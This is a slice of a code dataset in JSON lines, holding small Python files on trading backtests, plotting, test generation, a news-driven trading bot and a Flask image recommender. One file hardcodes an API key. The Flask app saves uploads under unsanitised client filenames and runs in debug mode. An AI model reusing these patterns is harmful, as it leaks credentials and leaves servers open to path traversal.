{"api_name": "django.http.HttpResponse", "line_number": 37, "usage_type": "call"}, {"api_name": "django.utils.simplejson.dumps", "line_number": 37, "usage_type": "call"}, {"api_name": "django.utils.simplejson", "line_number": 37, "usage_type": "name"}, {"api_name": "common.views.DecimalEncoder", "line_number": 37, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 39, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 47, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 49, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 52, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 55, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 56, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 61, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 71, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 77, "usage_type": "call"}, {"api_name": "inventory.models.BatchLoad.objects.filter", "line_number": 78, "usage_type": "call"}, {"api_name": "inventory.models.BatchLoad.objects", "line_number": 78, "usage_type": "attribute"}, {"api_name": "inventory.models.BatchLoad", "line_number": 78, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 79, "usage_type": "call"}, {"api_name": "urllib.unquote", "line_number": 88, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 96, "usage_type": "call"}, {"api_name": "django.utils.simplejson.dumps", "line_number": 96, "usage_type": "call"}, {"api_name": "django.utils.simplejson", "line_number": 96, "usage_type": "name"}, {"api_name": "common.views.DecimalEncoder", "line_number": 96, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 98, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 111, "usage_type": "call"}, {"api_name": "django.utils.simplejson.dumps", "line_number": 111, "usage_type": "call"}, {"api_name": "django.utils.simplejson", "line_number": 111, "usage_type": "name"}, {"api_name": "common.views.DecimalEncoder", "line_number": 111, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 112, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 119, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 123, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 136, "usage_type": "call"}, {"api_name": "django.utils.simplejson.dumps", "line_number": 136, "usage_type": "call"}, {"api_name": "django.utils.simplejson", "line_number": 136, "usage_type": "name"}, {"api_name": "common.views.DecimalEncoder", "line_number": 136, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 137, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 144, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 148, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 153, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 159, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 165, 
"usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 183, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 189, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 209, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 215, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 221, "usage_type": "call"}]}
+{"seq_id": "20979359181", "text": "# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nimport random\nimport requests\n\n\ndef get_city_id(city_name):\n '''获取城市的id,为后边的做准备'''\n city_url = 'http://apis.baidu.com/baidunuomi/openapi/cities'\n headers = {'apikey': '14cdd85738c717e546a5b6852c3e1631'}\n\n r = requests.get(city_url, headers=headers)\n cities = r.json()['cities']\n for city in cities:\n # 注意此处没有使用`==`,而是使用了`in`\n if city_name in city['city_name']:\n return city['city_id']\n # 如果找到输入的城市,则返回城市的id,如果没找到,就退出\n print('city not found')\n assert 0\n\n\ndef get_shops_list(city_id, keyword, location):\n shops_url = 'http://apis.baidu.com/baidunuomi/openapi/searchshops'\n headers = {'apikey': '14cdd85738c717e546a5b6852c3e1631'}\n payload = {'city_id': city_id, 'location': location,\n 'keyword': keyword, 'sort': 4}\n ''' 获取给定关键词搜索到的店铺的名称,并按照销量排序,\n 此处输入了位置信息,输入自己所在的坐标即返回自己附近的餐馆\n 还有很多可选参数,请参考:\n http://apistore.baidu.com/apiworks/servicedetail/508.html\n '''\n r = requests.get(shops_url, params=payload, headers=headers)\n return r.json()['data']['shops']\n\n\ndef get_all_deals(shop_list):\n deal_list = []\n for shop in shop_list:\n for deal in shop['deals']:\n deal_list.append([deal['title'],\n deal['description'],\n deal['promotion_price'] / 100,\n deal['score']])\n # 在一大堆信息中,我们只选取了餐馆的名字、描述、价格和评分\n return deal_list\n\nif __name__ == '__main__':\n city_id = get_city_id('南京')\n shop_list = get_shops_list(city_id, '黄焖鸡', '32.0219605,118.7987918')\n deal_list = get_all_deals(shop_list)\n # 搜索南京市给定位置附近销量大的黄焖鸡\n print(random.choice(deal_list))\n # 随机选一个团购单下单吧!\n", "repo_name": "crossin/py-practice", "sub_path": "src/nuomi/nuomi.py", "file_name": "nuomi.py", "file_ext": "py", "file_size_in_byte": 2195, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "requests.get", "line_number": 16, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 37, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 57, "usage_type": "call"}]}
+{"seq_id": "9045733696", "text": "# pip install backtrader pandas\r\n# https://finance.yahoo.com/quote/GAZP.ME/history?p=GAZP.ME\r\n\r\nfrom __future__ import (absolute_import, division, print_function,\r\n unicode_literals)\r\n\r\nimport backtrader as bt\r\nimport pandas as pd\r\nimport datetime # For datetime objects\r\nimport os.path # To manage paths\r\nimport sys # To find out the script name (in argv[0])\r\n\r\n\r\n# Create a Stratey\r\nclass TestStrategy(bt.Strategy):\r\n\r\n def log(self, txt, dt=None):\r\n ''' Logging function fot this strategy'''\r\n dt = dt or self.datas[0].datetime.date(0)\r\n print('%s, %s' % (dt.isoformat(), txt))\r\n\r\n def __init__(self):\r\n # Keep a reference to the \"close\" line in the data[0] dataseries\r\n self.dataclose = self.datas[0].close\r\n\r\n # To keep track of pending orders\r\n self.order = None\r\n\r\n def notify_order(self, order):\r\n if order.status in [order.Submitted, order.Accepted]:\r\n # Buy/Sell order submitted/accepted to/by broker - Nothing to do\r\n return\r\n\r\n # Check if an order has been completed\r\n # Attention: broker could reject order if not enough cash\r\n if order.status in [order.Completed]:\r\n if order.isbuy():\r\n self.log('BUY EXECUTED, %.2f' % order.executed.price)\r\n elif order.issell():\r\n self.log('SELL EXECUTED, %.2f' % order.executed.price)\r\n\r\n self.bar_executed = len(self)\r\n\r\n elif order.status in [order.Canceled, order.Margin, order.Rejected]:\r\n self.log('Order Canceled/Margin/Rejected')\r\n\r\n # Write down: no pending order\r\n self.order = None\r\n\r\n def notify_trade(self, trade):\r\n if not trade.isclosed:\r\n return\r\n\r\n self.log('OPERATION PROFIT, GROSS %.2f, NET %.2f' %\r\n (trade.pnl, trade.pnlcomm))\r\n\r\n def next(self):\r\n # Simply log the closing price of the series from the reference\r\n self.log('Close, %.2f' % self.dataclose[0])\r\n # print(\"*\", self.datas[0].close[0])\r\n\r\n # Check if an order is pending ... if yes, we cannot send a 2nd one\r\n if self.order:\r\n return\r\n\r\n # Check if we are in the market\r\n if not self.position:\r\n\r\n # Not yet ... we MIGHT BUY if ...\r\n if self.dataclose[0] < self.dataclose[-1]:\r\n # current close less than previous close\r\n\r\n if self.dataclose[-1] < self.dataclose[-2]:\r\n # previous close less than the previous close\r\n\r\n # BUY, BUY, BUY!!! (with default parameters)\r\n self.log('BUY CREATE, %.2f' % self.dataclose[0])\r\n\r\n # Keep track of the created order to avoid a 2nd order\r\n self.order = self.buy()\r\n\r\n else:\r\n\r\n # Already in the market ... we might sell\r\n if len(self) >= (self.bar_executed + 50):\r\n # SELL, SELL, SELL!!! 
(with all possible default parameters)\r\n self.log('SELL CREATE, %.2f' % self.dataclose[0])\r\n\r\n # Keep track of the created order to avoid a 2nd order\r\n self.order = self.sell()\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n modpath = os.path.dirname(os.path.abspath(sys.argv[0]))\r\n datapath = os.path.join(modpath, 'GAZP_D1.csv')\r\n\r\n # print(datapath)\r\n # exit(1)\r\n\r\n data = pd.read_csv(datapath, sep=',', index_col='Date') # this data is from metatrader 5\r\n print(data)\r\n data = data.reset_index()\r\n data.rename(columns={'Date': 'datetime', 'Open': 'open', 'High': 'high',\r\n 'Low': 'low', 'Close': 'close', 'Volume': 'volume'},\r\n inplace=True) # Чтобы получить дату/время переименовываем колонки\r\n data.index = pd.to_datetime(data['datetime'])\r\n print(data)\r\n\r\n cerebro = bt.Cerebro()\r\n\r\n # Add a strategy\r\n cerebro.addstrategy(TestStrategy)\r\n\r\n cerebro.broker.setcash(100000.0)\r\n\r\n # Set the commission - 0.1% ... divide by 100 to remove the %\r\n cerebro.broker.setcommission(commission=0.001)\r\n\r\n # modpath = os.path.dirname(os.path.abspath(sys.argv[0]))\r\n # datapath = os.path.join(modpath, 'GAZP.ME (1).csv')\r\n # Create a Data Feed\r\n # data = bt.feeds.YahooFinanceCSVData(\r\n # dataname=datapath, # yahoo data downloaded from site\r\n # # Do not pass values before this date\r\n # fromdate=datetime.datetime(2022, 1, 1),\r\n # # Do not pass values after this date\r\n # todate=datetime.datetime(2022, 4, 1),\r\n # reverse=False)\r\n\r\n # Pass it to the backtrader datafeed and add it to the cerebro\r\n data = bt.feeds.PandasData(dataname=data)\r\n\r\n # Add the Data Feed to Cerebro\r\n cerebro.adddata(data)\r\n\r\n print('Starting Portfolio Value: %.2f' % cerebro.broker.getvalue())\r\n\r\n cerebro.run()\r\n\r\n print('Final Portfolio Value: %.2f' % cerebro.broker.getvalue())", "repo_name": "WISEPLAT/Learn-BackTrader", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 5010, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 43, "dataset": "github-code", "pt": "31", "api": [{"api_name": "backtrader.Strategy", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.path.dirname", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 95, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 95, "usage_type": "name"}, {"api_name": "os.path.path.abspath", "line_number": 95, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 95, "usage_type": "attribute"}, {"api_name": "os.path.path.join", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 96, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 96, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 101, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 107, "usage_type": "call"}, {"api_name": "backtrader.Cerebro", "line_number": 110, "usage_type": "call"}, {"api_name": "backtrader.feeds.PandasData", "line_number": 132, "usage_type": "call"}, {"api_name": "backtrader.feeds", "line_number": 132, "usage_type": "attribute"}]}
+{"seq_id": "16762797543", "text": "# -*- coding: utf-8 -*-\n\nimport datetime\nimport csv\nimport math\nimport matplotlib\nimport matplotlib.pyplot as pyplot\nimport matplotlib.dates as dates\n\nmatplotlib.rc('font', family='Arial')\nformatter = dates.DateFormatter('%d. %m. %Y')\n\ndata1 = {}\ndata2 = {}\nwith open('../data/processed/answer_time.csv', 'rb') as csvfile:\n reader = csv.reader(csvfile, delimiter=',', quotechar='\"')\n for row in reader:\n if int(row[0]) == 1:\n if not (int(row[1])/1000) in data1:\n data1[int(row[1])/1000] = 0\n data1[int(row[1])/1000] += 1\n else:\n if not (int(row[1])/1000) in data2:\n data2[int(row[1])/1000] = 0\n data2[int(row[1])/1000] += 1\n\nx = range(0,max(data1.keys())+1)\n\ny1 = [0 for _ in range (max(data1.keys())+1)]\nfor key, value in data1.items():\n y1[key] = value\n\ny2 = [0 for _ in range (max(data1.keys())+1)]\nfor key, value in data2.items():\n y2[key] = value\n\n\npyplot.ylabel(u'Počet odpovědí')\npyplot.xlabel(u'Čas (v sekundách)')\nax = pyplot.subplot()\npyplot.plot(x,y1, label=u'Otázky rozpoznání reprezentace')\nax = pyplot.subplot()\npyplot.plot(x,y2, label=u'Otázky rozpoznání obrázku')\npyplot.axis([0, 30 , 0, 400])\n\nhandles, labels = ax.get_legend_handles_labels()\ndisplay = (0,1)\nax.legend([handle for i,handle in enumerate(handles) if i in display], [label for i,label in enumerate(labels) if i in display], loc='upper right')\n\npyplot.show()", "repo_name": "repli2dev/nature-quizzer-analysis", "sub_path": "visualizations/answer_time_distribution.py", "file_name": "answer_time_distribution.py", "file_ext": "py", "file_size_in_byte": 1450, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "matplotlib.rc", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.dates.DateFormatter", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.dates", "line_number": 11, "usage_type": "name"}, {"api_name": "csv.reader", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}]}
+{"seq_id": "70132913048", "text": "import math\nimport argparse\nimport os\nimport random\nfrom os import path\n\nrandom.seed(42)\n\nALPHABETS = \"ACGT\"\n\ndef main(output_location, number_of_cases):\n\n # If the location does not exists, create it\n if not path.isdir(output_location):\n os.mkdir(output_location)\n\n len_of_zero_padding = len(str(number_of_cases))\n\n # Create test files as much as the number of cases\n for i in range(number_of_cases):\n\n # Create a file with input cases\n with open(f\"{output_location}/input{i:0>{len_of_zero_padding}}.txt\", \"w\", encoding=\"utf-8\") as file:\n\n for _ in range(2):\n # Write first string\n file.write(f\"{''.join(random.sample(ALPHABETS, len(ALPHABETS)))}\\n\")\n\n # Write indices\n current = len(ALPHABETS)\n\n for _ in range(0, random.randint(3, 7)):\n index = random.randint(0, current)\n current += current\n\n # Write index to the file\n file.write(f\"{index}\\n\")\n # We're done\n\n print(f\"Generation of test files done at :: {output_location}\")\n\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-ol\", \"--output-location\", type=str, default=\"./../input\", help=\"Location of the direrctory where to output the test files. Do not end with a slash.\")\n parser.add_argument(\"-n\", \"--number-of-cases\", type=int, default=16, help=\"Number of test files to generate.\")\n args = parser.parse_args()\n \n main(args.output_location, args.number_of_cases)", "repo_name": "daveaditya/CSCI_570_ALGO", "sub_path": "src/main/resources/python/test_generator.py", "file_name": "test_generator.py", "file_ext": "py", "file_size_in_byte": 1462, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "random.seed", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "name"}, {"api_name": "os.mkdir", "line_number": 15, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 27, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 32, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 33, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 46, "usage_type": "call"}]}
+{"seq_id": "29831783248", "text": "import argparse\n\n\ndef TestOptions():\n parser = argparse.ArgumentParser(description='PyTorch hand pose Training')\n \n #dataset\n #model structure\n parser.add_argument('--target-weight', dest='target_weight',\n action='store_true',\n help='Loss with target_weight')\n parser.add_argument('--is-train', type=bool, default=False,\n help='is train')\n parser.add_argument('--gpu-ids', type=str, default='0', help='gpu ids: e.g. 0 0,1,2, 0,2. use -1 for CPU')\n parser.add_argument('--hpe-enabled', type=bool, default=False, help='is hpe')\n \n\n \n # data preprocessing\n \n \n #checkpoint\n \n return parser.parse_args()", "repo_name": "baeckgoo/ir-hand", "sub_path": "HPE2/src/options/test_options.py", "file_name": "test_options.py", "file_ext": "py", "file_size_in_byte": 717, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "31", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 5, "usage_type": "call"}]}
+{"seq_id": "14718394771", "text": "from optibook.synchronous_client import Exchange\r\n# from basic_trader import start_trading\r\nfrom smarter_trader import start_trading\r\nfrom IPython.display import clear_output\r\nfrom social_feeds import get_social_feed\r\n# from testing_feeds import get_mood_for_news\r\n\r\nimport asyncio\r\nimport time\r\nimport logging\r\nlogger = logging.getLogger('client')\r\nlogger.setLevel('ERROR')\r\n\r\nprint(\"Setup was successful.\")\r\n\r\nexchange = Exchange()\r\nexchange.connect()\r\n\r\nINSTRUMENTS = exchange.get_instruments()\r\n\r\nQUOTED_VOLUME = 10\r\nFIXED_MINIMUM_CREDIT = 0.15\r\nPRICE_RETREAT_PER_LOT = 0.005\r\nPOSITION_LIMIT = 100\r\n\r\nhold = {\r\n 'CSCO': {'value': 0, 'mood': None},\r\n 'PFE': {'value': 0, 'mood': None},\r\n 'SAN': {'value': 0, 'mood': None},\r\n 'ING': {'value': 0, 'mood': None},\r\n 'NVDA': {'value': 0, 'mood': None},\r\n}\r\n\r\nasync def trader():\r\n global hold\r\n while True:\r\n start_trading(exchange, INSTRUMENTS, QUOTED_VOLUME, FIXED_MINIMUM_CREDIT, PRICE_RETREAT_PER_LOT, POSITION_LIMIT, hold)\r\n \r\n await asyncio.sleep(2)\r\n \r\n for k, v in hold.items():\r\n if v['value'] > 0:\r\n hold[k]['value'] = v['value'] - 1\r\n \r\n # Clear the displayed information after waiting\r\n clear_output(wait=True)\r\n \r\nasync def newsChecker():\r\n global hold\r\n while True:\r\n social_feeds = get_social_feed(exchange)\r\n \r\n if social_feeds:\r\n for feed, mood in social_feeds.items():\r\n if not feed:\r\n continue\r\n \r\n if mood < 0.45:\r\n hold[feed] = {'value': 12, 'mood': 'ask'}\r\n exchange.delete_orders(feed)\r\n print(f'Someting bad happened to {feed}')\r\n \r\n elif mood > 0.55:\r\n hold[feed] = {'value': 12, 'mood': 'bid'}\r\n exchange.delete_orders(feed)\r\n print(f'Someting good happened to {feed}')\r\n else:\r\n exchange.delete_orders(feed)\r\n continue\r\n else:\r\n print(f'\\n --- No news --- \\n')\r\n \r\n await asyncio.sleep(5)\r\n \r\n \r\nloop = asyncio.get_event_loop()\r\ntask1 = asyncio.ensure_future(trader())\r\ntask2 = asyncio.ensure_future(newsChecker())\r\n\r\nloop.run_until_complete(asyncio.gather(task1, task2))", "repo_name": "LeonsBuntis/hackzurich2023", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2401, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "optibook.synchronous_client.Exchange", "line_number": 16, "usage_type": "call"}, {"api_name": "smarter_trader.start_trading", "line_number": 37, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 39, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 46, "usage_type": "call"}, {"api_name": "social_feeds.get_social_feed", "line_number": 51, "usage_type": "call"}, {"api_name": "social_feeds.items", "line_number": 54, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 73, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 76, "usage_type": "call"}, {"api_name": "asyncio.ensure_future", "line_number": 77, "usage_type": "call"}, {"api_name": "asyncio.ensure_future", "line_number": 78, "usage_type": "call"}, {"api_name": "asyncio.gather", "line_number": 80, "usage_type": "call"}]}
+{"seq_id": "23031401312", "text": "from flask import Flask, render_template, request\nfrom PIL import Image\nimport numpy as np\nimport pickle\nimport tensorflow\nimport keras\nfrom keras.utils import load_img, img_to_array\nfrom keras.preprocessing import image\nfrom keras.layers import GlobalMaxPooling2D\nfrom keras.applications.resnet import ResNet50,preprocess_input\nfrom sklearn.neighbors import NearestNeighbors\nfrom numpy.linalg import norm\n\nfeature_list = np.array(pickle.load(open('embedded.pkl','rb')))\nfilenames = pickle.load(open('filenames.pkl','rb'))\n\nmodel = ResNet50(weights='imagenet',include_top=False,input_shape=(224,224,3))\nmodel.trainable = False\n\nmodel = tensorflow.keras.Sequential([\n model,\n GlobalMaxPooling2D()\n])\n\n\n\ndef feature_extraction(img_path,model):\n img = load_img(img_path, target_size=(224, 224))\n img_array = img_to_array(img)\n expanded_img_array = np.expand_dims(img_array, axis=0)\n preprocessed_img = preprocess_input(expanded_img_array)\n result = model.predict(preprocessed_img).flatten()\n normalized_result = result / norm(result)\n\n return normalized_result\n\ndef recommend(features,feature_list):\n neighbors = NearestNeighbors(n_neighbors=5, algorithm='brute', metric='euclidean')\n neighbors.fit(feature_list)\n\n distances, indices = neighbors.kneighbors([features])\n print(indices)\n return indices\n\n\napp = Flask(__name__)\n\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n@app.route('/', methods = ['post'])\ndef imageWork():\n imagefile = request.files['image_input']\n imagePath = \"./static/uploads/\" + imagefile.filename\n imagefile.save(imagePath) \n image_sample = feature_extraction(imagePath,model)\n indices = recommend(image_sample,feature_list)\n list_add = []\n for file in indices[0][0:8]:\n list_add.append(filenames[file])\n list_add\n display_image = list_add[0]\n return render_template('index.html', imagelist = list_add, display_image = display_image)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)", "repo_name": "anoopjoshi015/Product-Recommendation", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2014, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "numpy.array", "line_number": 14, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 14, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 15, "usage_type": "call"}, {"api_name": "keras.applications.resnet.ResNet50", "line_number": 17, "usage_type": "call"}, {"api_name": "tensorflow.keras.Sequential", "line_number": 20, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 20, "usage_type": "attribute"}, {"api_name": "keras.layers.GlobalMaxPooling2D", "line_number": 22, "usage_type": "call"}, {"api_name": "keras.utils.load_img", "line_number": 28, "usage_type": "call"}, {"api_name": "keras.utils.img_to_array", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 30, "usage_type": "call"}, {"api_name": "keras.applications.resnet.preprocess_input", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 33, "usage_type": "call"}, {"api_name": "sklearn.neighbors.NearestNeighbors", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 46, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 52, "usage_type": "call"}, {"api_name": 
"flask.request.files", "line_number": 57, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 57, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 67, "usage_type": "call"}]}
+{"seq_id": "16516135319", "text": "import json\nimport jsonschema\nimport octobot_commons.logging\n\n\nLOGGER_NAME = \"json_util\"\n\n\ndef validate(config, schema_file) -> None:\n \"\"\"\n Validate a config file, raise upon validation error\n :param config: the config\n :param schema_file: the config schema\n :return: None\n \"\"\"\n with open(schema_file) as json_schema:\n loaded_schema = json.load(json_schema)\n jsonschema.validate(instance=config, schema=loaded_schema)\n\n\ndef read_file(\n file_path: str,\n raise_errors: bool = True,\n on_error_value: dict = None,\n open_mode=\"r\",\n) -> dict:\n \"\"\"\n Read a load the given file with json.load()\n :param file_path: file to read\n :param raise_errors: when True will forward errors. Will just log errors otherwise\n :param on_error_value: return this value when raise_errors is False and an error occurs\n :param open_mode: the file open mode to give to open()\n :return: the parsed file or default value on error if possible\n \"\"\"\n try:\n with open(file_path, open_mode) as open_file:\n return json.load(open_file)\n except PermissionError as err:\n if raise_errors:\n raise\n octobot_commons.logging.get_logger(LOGGER_NAME).error(\n f\"Permission error when reading {file_path} file: {err}.\"\n )\n except Exception as err:\n if raise_errors:\n raise\n octobot_commons.logging.get_logger(LOGGER_NAME).exception(\n f\"Unexpected error when reading {file_path} file: {err}.\"\n )\n if on_error_value is None:\n raise ValueError(\"on_error_value is unset\")\n return on_error_value\n", "repo_name": "techfreaque/octane", "sub_path": "octobot-packages/OctoBot-Commons/octobot_commons/json_util.py", "file_name": "json_util.py", "file_ext": "py", "file_size_in_byte": 1636, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "32", "api": [{"api_name": "json.load", "line_number": 17, "usage_type": "call"}, {"api_name": "jsonschema.validate", "line_number": 18, "usage_type": "call"}, {"api_name": "json.load", "line_number": 37, "usage_type": "call"}, {"api_name": "octobot_commons.logging.logging.get_logger", "line_number": 41, "usage_type": "call"}, {"api_name": "octobot_commons.logging.logging", "line_number": 41, "usage_type": "attribute"}, {"api_name": "octobot_commons.logging", "line_number": 41, "usage_type": "name"}, {"api_name": "octobot_commons.logging.logging.get_logger", "line_number": 47, "usage_type": "call"}, {"api_name": "octobot_commons.logging.logging", "line_number": 47, "usage_type": "attribute"}, {"api_name": "octobot_commons.logging", "line_number": 47, "usage_type": "name"}]}
+{"seq_id": "46119690232", "text": "#!/usr/bin/env python\n\nfrom setuptools import setup\n\nREQUIRES = [\n 'wiringpi'\n]\n\nsetup(name='Servo Control',\n version='1.0',\n description='Servo Script',\n author='Juan Pablo Samper',\n author_email='jpsamper2009@gmail.com',\n url='https://github.com/pereza77/decisionMakerServer',\n install_requires=REQUIRES\n )\n", "repo_name": "angelicaperez37/decisionMakerServer", "sub_path": "servo/setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 344, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "setuptools.setup", "line_number": 9, "usage_type": "call"}]}
+{"seq_id": "72479020250", "text": "import os\nimport json\nimport yaml\n\nimport SpendedTime\n\n\nlogs_directory = './'\nlog_file_name = 'statistics.json'\nconfig_file_name = 'used_config.yaml'\n\ndef get_config_file(file_name):\n with open(file_name, 'r') as stream:\n return yaml.load(stream)\n\ndef get_log_file(file_name):\n with open(file_name) as content:\n return json.load(content)\n\ndef is_result_directory(path):\n return (os.path.isdir(path) and log_file_name in os.listdir(path) and config_file_name in os.listdir(path))\n\ndef main():\n for file_or_foldername in os.listdir(logs_directory):\n file_or_folderpath = os.path.join(logs_directory, file_or_foldername)\n if is_result_directory(file_or_folderpath):\n log_file = get_log_file(os.path.join(file_or_folderpath, log_file_name))\n config_file = get_config_file(os.path.join(file_or_folderpath, config_file_name))\n\n for product_id in [i['id'] for i in config_file['productionLine']['products']]:\n SpendedTime.generate_chart(file_or_folderpath, config_file, log_file, product_id)\n\nif __name__ == '__main__':\n main()", "repo_name": "Claypuppet/OSM-factorysim", "sub_path": "scripts/python/Graphs.py", "file_name": "Graphs.py", "file_ext": "py", "file_size_in_byte": 1111, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "yaml.load", "line_number": 14, "usage_type": "call"}, {"api_name": "json.load", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 21, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "SpendedTime.generate_chart", "line_number": 31, "usage_type": "call"}]}
